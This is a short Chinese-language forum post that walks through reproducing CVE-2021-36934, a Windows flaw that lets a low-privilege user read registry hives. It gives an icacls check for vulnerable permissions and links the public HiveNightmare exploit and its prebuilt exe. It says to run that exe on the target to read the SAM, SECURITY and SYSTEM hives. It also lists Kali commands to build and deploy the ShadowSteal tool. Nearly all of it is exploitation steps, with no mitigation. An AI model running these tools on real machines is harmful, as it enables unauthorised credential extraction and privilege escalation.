CVE-2021-36934 Windows提权漏洞复现
执行以下命令:icacls C:\windows\system32\config\sam
如果输出 BUILTIN\Users:(I)(RX) 表示该系统易受测试。
漏洞复现
EXP 地址为:https://github.com/GossiTheDog/HiveNightmare
作者编译好的 exe 文件:
https://github.com/GossiTheDog/HiveNightmare/releases/download/0.5/HiveNightmare.exe
直接将作者编译好的 HiveNightmare.exe 拷贝到目标系统上执行,这里以 Windows 10为例。
可以看到在低权限账号下,成功利用 CVE-2021–36934 读取到了 SAM、SECURITY、SYSTEM 三个文件。
在kali下复现
sudo apt-get install nim
nimble install zippy argparse
nimble install winim
sudo apt-get install mingw-w64
git clone https://github.com/HuskyHacks/ShadowSteal.git && cd ShadowSteal
make && cd bin/ && ls -l
将编译好的 ShadowSteal.exe 放到目标系统上直接执行即可。
页:
[1]